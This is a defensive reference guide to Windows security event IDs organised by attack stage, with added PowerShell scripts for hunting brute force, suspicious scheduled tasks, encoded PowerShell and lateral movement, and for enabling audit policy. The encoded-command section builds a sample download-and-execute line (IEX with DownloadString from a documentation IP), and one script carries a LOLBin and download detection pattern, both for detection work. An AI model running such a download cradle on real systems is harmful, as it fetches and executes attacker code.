
Every Windows administrator and SOC analyst should know which event IDs matter, because they are the primary evidence for detecting and investigating attacks. This list is organized by attack stage and draws on incident response experience and Microsoft's security auditing documentation.
Authentication and Logon Events (High Priority)

These events should be your first alerting priority: they are the most direct evidence of credential attacks and authentication problems.
| Event ID | Category | What It Means |
|---|---|---|
| 4624 | Successful Logon | An account logged on successfully. Check Logon Type (2 = interactive, 3 = network, 10 = RemoteInteractive/RDP, 4 = batch, 5 = service) and Authentication Package (Kerberos or NTLM) |
| 4625 | Failed Logon | Failed logon attempt. Many failures from one source against one account is brute force; a few failures each against many accounts is password spraying. Status/SubStatus give the reason (0xC000006A bad password, 0xC0000064 unknown user, 0xC0000234 locked out) |
| 4648 | Explicit Credentials | Logon attempted with explicit credentials (runas, net use, scheduled tasks, many admin tools). Common in legitimate use, so filter on the Subject/Target account pair and Target Server rather than alerting on volume |
| 4672 | Admin Logon | Special privileges (SeDebugPrivilege, SeTcbPrivilege and similar) assigned to a new logon, in practice an administrator-equivalent logon. Alert when unexpected accounts appear, especially on workstations |
| 4740 | Account Lockout | User account locked out (recorded on the domain controller, with the Caller Computer Name). Investigate if frequent or if it hits service or privileged accounts |
| 4768 | Kerberos TGT Request | Authentication ticket (TGT) requested (domain controllers only). Failures carry a Result Code: 0x6 unknown principal (account enumeration), 0x12 disabled, expired or locked-out account. Bad passwords show up as 4771 (pre-authentication failed) instead |
| 4769 | Kerberos Service Ticket | Service ticket requested (domain controllers only). Monitor for unusual service access patterns and for RC4 tickets (Ticket Encryption Type 0x17) to accounts with SPNs, the signature of Kerberoasting |
| 4649 | Replay Attack | A replay attack was detected (an authenticator reused). Rare; investigate every occurrence |
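The following PowerShell is an added example, not part of the original article: it pulls 4625 events from the local Security log for a time window, reads the fields from the event XML, and groups failures by source address so that both brute force (one account, many failures) and password spraying (many accounts, few failures each) stand out. The 60-minute window, the threshold of 20 failures and the "more than 5 accounts means spraying" rule are assumptions to tune for your environment.

```powershell
# Added example, not from the original article. Summarise failed logons (4625)
# on this host over a time window and flag sources exceeding a threshold.
# Window, threshold and the "many accounts = spray" heuristic are assumptions;
# tune them to your environment. Run in an elevated PowerShell session.
$WindowMinutes = 60
$Threshold     = 20

# FilterHashtable is evaluated by the event log service, which is far faster
# than piping every Security event through Where-Object.
$failed = Get-WinEvent -FilterHashtable @{
    LogName   = 'Security'
    Id        = 4625
    StartTime = (Get-Date).AddMinutes(-$WindowMinutes)
} -ErrorAction SilentlyContinue   # "no events found" is reported as an error

# Read named fields from the event XML rather than the message text, which
# is localised and changes wording between Windows versions.
$rows = foreach ($e in $failed) {
    $x = [xml]$e.ToXml()
    $d = @{}
    foreach ($n in $x.Event.EventData.Data) { $d[$n.Name] = $n.'#text' }
    [pscustomobject]@{
        Time        = $e.TimeCreated
        Account     = $d['TargetUserName']
        SourceIp    = $d['IpAddress']         # '-' for local/console failures
        Workstation = $d['WorkstationName']
        LogonType   = $d['LogonType']
        Status      = $d['Status']            # 0xC000006D: bad user name or password
        SubStatus   = $d['SubStatus']         # 0xC000006A: bad password, 0xC0000064: no such user
    }
}

# One source, many failures against one account = brute force.
# One source, a few failures against many accounts = password spraying,
# which a per-account lockout threshold alone will not catch.
$suspicious = $rows |
    Group-Object SourceIp |
    ForEach-Object {
        $accounts = @($_.Group.Account | Sort-Object -Unique)
        $pattern  = if ($accounts.Count -gt 5) { 'spray' } else { 'brute-force' }
        [pscustomobject]@{
            SourceIp         = $_.Name
            Failures         = $_.Count
            DistinctAccounts = $accounts.Count
            UnknownUsers     = @($_.Group | Where-Object SubStatus -eq '0xC0000064').Count
            FirstSeen        = ($_.Group.Time | Measure-Object -Minimum).Minimum
            LastSeen         = ($_.Group.Time | Measure-Object -Maximum).Maximum
            Pattern          = $pattern
        }
    } |
    Where-Object { $_.Failures -ge $Threshold -or $_.DistinctAccounts -gt 5 } |
    Sort-Object Failures -Descending

$suspicious | Format-Table -AutoSize
```

A high UnknownUsers count from one source is account enumeration rather than guessing; a spray that stays just under your lockout threshold per account is exactly what the per-source grouping is there to catch.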
Account and Group Changes Events

| Event ID | Category | What It Means |
|---|---|---|
| 4720 | User Created | New user account created. Attackers add accounts for persistence; check the Subject (who created it) and whether it was added to a group shortly afterwards (4728/4732) |
| 4724 | Password Reset | Password reset attempted on another account (a user changing their own password is 4723). Resets of privileged or service accounts outside a change window warrant a look |
| 4728 | Global Group Member | Member added to a security-enabled global group (Domain Admins is a global group) |
| 4732 | Local Group Member | Member added to a security-enabled local group. Watch the Administrators group! Universal groups such as Enterprise Admins log 4756 instead |
| 4765 | SID History Added | SID History added to an account. Legitimate only during domain migrations; otherwise a privilege escalation and persistence technique |
| 4780 | Admin ACL Set | ACL reset on an account that is a member of an administrators group (the AdminSDHolder process). Repeated occurrences for the same account mean something keeps changing its permissions |
Persistence Mechanisms (Critical for Security)

Attackers leave these traces when establishing backdoors:
| Event ID | Channel | What It Means |
|---|---|---|
| 7045 | System | New service installed (source: Service Control Manager). Normal during software installation; otherwise a common footprint of malware persistence and of PsExec-style remote execution (PSEXESVC) |
| 4697 | Security | The same service installation recorded in the Security log. Requires the Audit Security System Extension subcategory; useful when the System log is not forwarded |
| 4698 | Security | Scheduled task created. The event carries the complete task XML in TaskContent; parse the Actions element for the command and arguments |
| 4702 | Security | Scheduled task updated. Attackers modify existing, legitimate-looking tasks rather than create new ones, so compare the new action against the old |
| 5861 | WMI-Activity | Permanent WMI event consumer bound to a filter (Microsoft-Windows-WMI-Activity/Operational). Stealthy persistence that survives reboot and lives in the WMI repository rather than in a service or task |
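As an added example (not from the original article), this PowerShell reads the last week of 4698 events, parses the task definition XML embedded in each event's TaskContent field, and reports who created the task, what it runs, as which principal and whether it is hidden. The list of interpreter and LOLBin names and the argument patterns used for the Suspicious flag are a starting heuristic, not a complete list.

```powershell
# Added example, not from the original article. List scheduled tasks created
# in the last 7 days (Security 4698) and extract who created them, what they
# run and as whom, from the task definition XML carried in the TaskContent field.
# The "suspicious binary" regex is a starting heuristic, not a complete list.
$since   = (Get-Date).AddDays(-7)
$lolbins = '(?i)(^|\\)(powershell|pwsh|cmd|mshta|wscript|cscript|rundll32|regsvr32|certutil|bitsadmin|msiexec)(\.exe)?"?\s*$'

$events = Get-WinEvent -FilterHashtable @{
    LogName = 'Security'; Id = 4698; StartTime = $since
} -ErrorAction SilentlyContinue

$tasks = foreach ($e in $events) {
    $x = [xml]$e.ToXml()
    $d = @{}
    foreach ($n in $x.Event.EventData.Data) { $d[$n.Name] = $n.'#text' }

    # TaskContent is a complete Task Scheduler XML document. PowerShell's XML
    # adapter ignores the namespace, so dotted navigation works directly.
    $task   = [xml]$d['TaskContent']
    $exec   = $task.Task.Actions.Exec          # $null for COM-handler actions
    $cmd    = [string]$exec.Command
    $argStr = [string]$exec.Arguments

    [pscustomobject]@{
        Time       = $e.TimeCreated
        Creator    = "$($d['SubjectDomainName'])\$($d['SubjectUserName'])"
        TaskName   = $d['TaskName']
        RunAs      = $task.Task.Principals.Principal.UserId
        RunLevel   = $task.Task.Principals.Principal.RunLevel   # HighestAvailable = elevated
        Hidden     = $task.Task.Settings.Hidden
        Triggers   = @($task.Task.Triggers.ChildNodes | ForEach-Object LocalName) -join ','
        Command    = $cmd
        Arguments  = $argStr
        # Interpreter/LOLBin launched, encoded or downloaded payload, or a hidden task
        Suspicious = ($cmd -match $lolbins) -or
                     ($argStr -match '(?i)-e[ncodedma]*\s|FromBase64|http|IEX|Invoke-Expression') -or
                     ($task.Task.Settings.Hidden -eq 'true')
    }
}

$tasks | Sort-Object Suspicious -Descending |
    Format-Table Time, Creator, TaskName, RunAs, Command, Suspicious -AutoSize
$tasks | Where-Object Suspicious | Format-List
```

The same field extraction works for 4702 (task updated), which is where attackers hijacking an existing task will show up; diff the Command and Arguments against the task's previous definition.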
Process Execution (Understanding What Ran)

| Event ID | Channel | What It Means |
|---|---|---|
| 4688 | Security | Process created. Requires the Audit Process Creation subcategory, and "Include command line in process creation events" or the CommandLine field stays empty and the event is of little use |
| 4104 | PowerShell | PowerShell script block logged (Microsoft-Windows-PowerShell/Operational). Records code as it is executed, after de-obfuscation, so encoded or string-built commands appear in the clear |
| 1 | Sysmon | Process creation with hashes, parent process and full command line (requires Sysmon) |
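The following PowerShell is an added example (not from the original article) of what command-line auditing buys you: it scans 4688 events for PowerShell launched with an encoded command and decodes the payload. The function Get-DecodedPowerShell, the prefix regex and the constructed sample command line are this example's own; the regex is a heuristic, because powershell.exe accepts any unambiguous abbreviation of -EncodedCommand (-e, -ec, -enc and so on) and attackers use all of them.

```powershell
# Added example, not from the original article. Find 4688 events in the last
# 24 hours whose command line launches PowerShell with -EncodedCommand and
# decode the payload. Requires "Include command line in process creation
# events"; without it the CommandLine field is empty and the loop skips it.
# The prefix regex is a heuristic: powershell.exe accepts any unambiguous
# abbreviation of -EncodedCommand (-e, -ec, -enc, ...), and attackers use them all.
function Get-DecodedPowerShell {
    param([Parameter(Mandatory)][string]$CommandLine)
    $m = [regex]::Match($CommandLine,
        '(?i)(?:^|\s)[-/]e[ncodedma]{0,13}\s+["'']?([A-Za-z0-9+/=]{16,})')
    if (-not $m.Success) { return $null }
    try {
        # -EncodedCommand carries base64 of UTF-16LE text, not UTF-8
        return [Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($m.Groups[1].Value))
    } catch {
        return "<undecodable: $($m.Groups[1].Value.Substring(0, 16))...>"
    }
}

# Constructed sample so the decoder can be exercised offline, independent of the log.
# 203.0.113.10 is a documentation (TEST-NET-3) address, not a real host.
$sampleScript = 'IEX (New-Object Net.WebClient).DownloadString("http://203.0.113.10/a")'
$sampleB64    = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($sampleScript))
$sampleCmd    = "powershell.exe -nop -w hidden -enc $sampleB64"
Get-DecodedPowerShell $sampleCmd        # exercise the decoder on the constructed sample

# Live hunt against the local Security log.
$procs = Get-WinEvent -FilterHashtable @{
    LogName = 'Security'; Id = 4688; StartTime = (Get-Date).AddHours(-24)
} -ErrorAction SilentlyContinue

foreach ($e in $procs) {
    $x = [xml]$e.ToXml()
    $d = @{}
    foreach ($n in $x.Event.EventData.Data) { $d[$n.Name] = $n.'#text' }
    $cmd = $d['CommandLine']
    if ([string]::IsNullOrWhiteSpace($cmd)) { continue }   # command-line auditing is off
    $decoded = Get-DecodedPowerShell $cmd
    if ($decoded) {
        [pscustomobject]@{
            Time    = $e.TimeCreated
            User    = "$($d['SubjectDomainName'])\$($d['SubjectUserName'])"
            Parent  = $d['ParentProcessName']   # an Office binary spawning powershell.exe is a classic
            Image   = $d['NewProcessName']
            Decoded = $decoded
        }
    }
}
```

With script block logging enabled, the same payload also appears decoded in 4104, including whatever the first stage downloads and runs next; 4688 tells you who launched it and from which parent.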
Lateral Movement (Detecting Spread)
| Event ID | Channel | What It Means |
|---|---|---|
| 4624 (Type 3) | Security | Network logon. Burst across hosts = lateral movement indicator |
| 4624 (Type 10) | Security | RDP logon. Unusual source IPs warrant investigation |
| 5140 | Security | Network share accessed (requires Audit File Share). Watch ADMIN$ and C$ access from workstations; ADMIN$ is where PsExec stages its service binary |
| 3 | Sysmon | Network connection from process – pairs with 4624 type 3 for attribution |
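As an added example (not from the original article), the PowerShell below summarises type 3 and type 10 logons on a host per account, with the distinct sources, the authentication package and whether the token was elevated. Run it on each host or against forwarded logs: one account fanning out to many hosts, or NTLM where Kerberos is expected (connections by IP address rather than host name are a common cause), is the pattern to chase. Skipping computer accounts and anonymous logons is this example's noise-reduction assumption.

```powershell
# Added example, not from the original article. Summarise network (type 3)
# and RDP (type 10) logons on this host for the last 24 hours, per account,
# with distinct sources and authentication package. Skipping computer accounts
# and anonymous logons is an assumption for noise reduction.
$since  = (Get-Date).AddHours(-24)
$logons = Get-WinEvent -FilterHashtable @{
    LogName = 'Security'; Id = 4624; StartTime = $since
} -ErrorAction SilentlyContinue

$rows = foreach ($e in $logons) {
    $x = [xml]$e.ToXml()
    $d = @{}
    foreach ($n in $x.Event.EventData.Data) { $d[$n.Name] = $n.'#text' }

    if ($d['LogonType'] -notin @('3', '10')) { continue }
    $user = $d['TargetUserName']
    # Computer accounts ($ suffix), the null session and ANONYMOUS LOGON make up
    # most legitimate type-3 traffic and drown everything else out.
    if ($user -match '\$$' -or $user -in @('-', 'ANONYMOUS LOGON')) { continue }

    [pscustomobject]@{
        Time      = $e.TimeCreated
        Account   = "$($d['TargetDomainName'])\$user"
        LogonType = $d['LogonType']
        SourceIp  = $d['IpAddress']
        Source    = $d['WorkstationName']             # source computer name
        AuthPkg   = $d['AuthenticationPackageName']   # Kerberos, NTLM or Negotiate
        Elevated  = $d['ElevatedToken']               # %%1842 = yes (Windows 10 / Server 2016 and later)
    }
}

$rows |
    Group-Object Account |
    ForEach-Object {
        $sources = @($_.Group.SourceIp | Sort-Object -Unique)
        [pscustomobject]@{
            Account        = $_.Name
            Logons         = $_.Count
            SourceCount    = $sources.Count
            Sources        = $sources -join ','
            NtlmLogons     = @($_.Group | Where-Object AuthPkg -eq 'NTLM').Count
            RdpLogons      = @($_.Group | Where-Object LogonType -eq '10').Count
            ElevatedLogons = @($_.Group | Where-Object Elevated -eq '%%1842').Count
            FirstSeen      = ($_.Group.Time | Measure-Object -Minimum).Minimum
            LastSeen       = ($_.Group.Time | Measure-Object -Maximum).Maximum
        }
    } |
    Sort-Object SourceCount, NtlmLogons -Descending |
    Format-Table -AutoSize
```

On a single host the interesting output is a user account with elevated NTLM network logons from an address that is not a management server; across forwarded logs, sort by SourceCount to find the account that touched the most machines.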
Defense Evasion (Critical Alerts)
| Event ID | Category | What It Means |
|---|---|---|
| 1102 | Security | Audit log cleared. Legitimate only during planned maintenance you already know about, so alert on every occurrence |
| 104 | System | Event log cleared (source Microsoft-Windows-Eventlog; covers the non-Security logs) |
| 4719 | Security | System audit policy changed. Attackers disable auditing before acting; compare the new and old settings in the event |
| 4907 | Security | Auditing settings (SACL) on an object changed |
| 4616 | Security | System time changed. Used to confuse timelines or to break Kerberos, which tolerates 5 minutes of skew by default. Small corrections by the Windows Time service are normal; large jumps made by a user process are not |
Object Access and Privilege Use
| Event ID | Category | What It Means |
|---|---|---|
| 4660 | Object Access | Object deleted. Only logged for objects with a SACL; pair with 4663 (same Handle ID) to learn which object it was |
| 4673 | Privilege Use | Privileged service called. Noisy; filter for specific privileges |
| 4674 | Privilege Use | Operation attempted on privileged object |
Additional High-Severity Events
From Microsoft's security auditing guidance (the "Events to Monitor" appendix):
| Event ID | What It Means |
|---|---|
| 4618 | Monitored security event pattern detected |
| 4794 | Attempt to set the Directory Services Restore Mode (DSRM) administrator password. Legitimate only during planned domain controller maintenance; otherwise a domain controller persistence technique |
| 4964 | Special groups assigned to new logon |
| 4897 | Role separation enabled (Active Directory Certificate Services) |
Important Note on Logging Configuration
Windows does not record several of the events above by default.
Microsoft recommends configuring auditing through Advanced Audit Policy Configuration rather than the legacy nine-category policy:
Computer Configuration > Windows Settings > Security Settings > Advanced Audit Policy Configuration
(in a Group Policy Object the path includes Policies after Computer Configuration). Also enable "Audit: Force audit policy subcategory settings to override audit policy category settings" under Security Options, or the subcategory settings can be silently ignored.
Two settings matter most for investigations: Audit Process Creation together with "Include command line in process creation events" (Administrative Templates > System > Audit Process Creation), which populates the command line in Event ID 4688, and "Turn on PowerShell Script Block Logging" (Administrative Templates > Windows Components > Windows PowerShell), which produces Event ID 4104. Without them you learn that powershell.exe ran, but not what it ran.
For richer process, network and file telemetry than the Security log provides, deploy Sysmon from Microsoft Sysinternals with a tuned configuration.
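The following PowerShell is an added example (not from the original article) that applies the configuration above on a single machine and verifies it. The subcategory names are the ones auditpol uses, and each is commented with the event IDs from this list that depend on it. In a domain, set the same values through Group Policy; local auditpol and registry changes are overwritten at the next policy refresh.

```powershell
# Added example, not from the original article. Enable, on the local machine,
# the audit subcategories and logging policies that the events in this list
# depend on, then verify. Run from an elevated prompt. In a domain, set the
# same values via Group Policy; local changes are overwritten on GPO refresh.

# 1. Force subcategory (advanced) audit policy to take precedence over the
#    legacy nine-category policy; otherwise the settings below may be ignored.
#    This is the registry value behind the "Audit: Force audit policy
#    subcategory settings ..." security option.
Set-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa' `
    -Name SCENoApplyLegacyAuditPolicy -Value 1 -Type DWord

# 2. Subcategories behind the event IDs in this list.
$subcategories = @(
    'Logon',                              # 4624, 4625, 4648, 4649
    'Special Logon',                      # 4672, 4964
    'User Account Management',            # 4720, 4724, 4740, 4765, 4780
    'Security Group Management',          # 4728, 4732
    'Security System Extension',          # 4697
    'Other Object Access Events',         # 4698, 4702
    'Process Creation',                   # 4688
    'Audit Policy Change',                # 4719, 4907
    'Security State Change',              # 4616
    'File Share',                         # 5140
    'Kerberos Authentication Service',    # 4768 (domain controllers only)
    'Kerberos Service Ticket Operations'  # 4769 (domain controllers only)
)
foreach ($s in $subcategories) {
    auditpol /set /subcategory:"$s" /success:enable /failure:enable | Out-Null
}

# 3. Include the command line in 4688 (policy: Administrative Templates >
#    System > Audit Process Creation > Include command line in process creation events).
$audit = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\Audit'
if (-not (Test-Path $audit)) { New-Item -Path $audit -Force | Out-Null }
Set-ItemProperty -Path $audit -Name ProcessCreationIncludeCmdLine_Enabled -Value 1 -Type DWord

# 4. PowerShell script block logging for 4104 (policy: Administrative Templates >
#    Windows Components > Windows PowerShell > Turn on PowerShell Script Block Logging).
$sbl = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging'
if (-not (Test-Path $sbl)) { New-Item -Path $sbl -Force | Out-Null }
Set-ItemProperty -Path $sbl -Name EnableScriptBlockLogging -Value 1 -Type DWord

# 5. Verify: every subcategory above should read "Success and Failure",
#    and both registry values should be 1.
auditpol /get /category:*
Get-ItemProperty -Path $audit | Select-Object ProcessCreationIncludeCmdLine_Enabled
Get-ItemProperty -Path $sbl   | Select-Object EnableScriptBlockLogging
```

Failure auditing on File Share and Logon can be noisy on busy file servers and domain controllers; if volume is a problem, keep success auditing everywhere and trim failure auditing per role rather than switching a subcategory off entirely.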
MITRE ATT&CK Mapping Quick Reference
| Technique | Primary Event IDs |
|---|---|
| Command and Scripting Interpreter (T1059) | 4688, 4104 |
| Service Persistence (T1543.003) | 7045, 4697 |
| Scheduled Task (T1053.005) | 4698, 4702 |
| Create Account (T1136) | 4720 |
| Account Manipulation (T1098) | 4728, 4732 |
| Remote Services (T1021) | 4624 (Type 3, Type 10), 5140, 7045 |
| Indicator Removal: Clear Windows Event Logs (T1070.001) | 1102, 104 |
| Impair Defenses: Disable Windows Event Logging (T1562.002) | 4719 |
Focus your monitoring on this core set first, then expand based on your environment's specific risks and compliance requirements.